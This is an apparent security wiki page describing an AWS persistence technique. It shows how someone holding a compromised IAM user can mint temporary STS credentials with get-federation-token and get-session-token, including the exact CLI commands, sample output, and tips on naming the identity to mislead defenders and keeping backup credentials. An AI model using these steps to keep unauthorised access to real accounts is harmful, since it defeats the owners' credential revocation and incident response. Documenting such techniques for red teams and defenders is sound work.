LinkedInGitHubYouTube

Generating Temporary AWS Credentials from IAM User

AWS persistence technique

Overview

This is an interesting access vector that threat actors are taking to avoid detection and maintain persistence. By generating temporary credentials (this can be done multiple times to have backups) threat actors can maintain persistence in a target's AWS account.

  • The temporary credentials remain active even if the original compromised IAM User has had their access keys deactivated / deleted

  • The temporary credentials have whatever permissions the compromised IAM User has at the current time so adding or removing permissions affects the temporary credentials' permissions

  • These options do not work with IAM Roles

sts:GetFederationToken

The user must have permission to execute sts:GetFederationToken

This can throw off defenders because you can name the new identity whatever you want!

The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User.

  • You can specify any name you want — it doesn't need to be a real user

  • You can specify any policy you want (up to 10 managed and/or inline policies) but you only have the permissions the user running this command has even if you pass it an administrator policy

aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "pZlpr[REDACTED]",
        "SessionToken": "IQoJb3J[REDACTED]",
        "Expiration": "2025-11-11T08:56:15+00:00"
    },
    "FederatedUser": {
        "FederatedUserId": "111111111111:sally",
        "Arn": "arn:aws:sts::111111111111:federated-user/sally"
    },
    "PackedPolicySize": 7
}

  • The credentials can be configured with aws --profile sally configure

aws --profile sally sts get-caller-identity
{
    "UserId": "111111111111:sally",
    "Account": "111111111111",
    "Arn": "arn:aws:sts::111111111111:federated-user/sally"
}

sts:GetSessionToken

The user needs no permissions to execute this command

This is less stealthy because you can't change the session name

The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User. 

aws --profile tyler sts get-session-token --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "PTBAG[REDACTED]",
        "SessionToken": "IQoJb3Jp[REDACTED]",
        "Expiration": "2025-11-10T08:47:10+00:00"
    }
}

  • The credentials can be configured with aws --profile tyler-backdoor configure

aws --profile tyler-backdoor sts get-caller-identity

{
    "UserId": "AIDA[REDACTED]",
    "Account": "111111111111",
    "Arn": "arn:aws:iam::111111111111:user/tyler"
}
PreviousBackdoor an IAM RoleNextGenerating Temporary Credentials from SSO Credentials File

Last updated

Was this helpful?